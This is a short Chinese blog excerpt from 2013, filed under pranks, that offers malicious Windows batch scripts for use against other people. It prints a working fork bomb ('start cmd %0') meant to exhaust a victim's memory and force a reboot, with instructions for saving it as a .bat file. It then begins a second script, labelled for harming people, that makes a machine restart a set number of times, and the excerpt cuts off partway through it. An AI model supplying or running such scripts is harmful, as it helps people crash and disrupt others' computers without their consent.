现在位置 >首页 > 恶搞
0℃
2013年03月08日 程序员幽默 ⁄ 被围观 4,997 views+
第一个:让别人内存OVER(逼他重启) @echo off start cmd %0 就这3行了 打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。 第二个:让对方重启指定次数(害人专用) @echo off if not exist c:1.txt echo. >c:1.txt & goto err1 if not exist c:2.txt echo. >c:2.txt & goto err1 if not exist c:3.txt echo. >c:3.txt & goto err1 if not exist c:4.txt echo. >c:4.txt &...
阅读全文

无觅相关文章插件,快速提升流量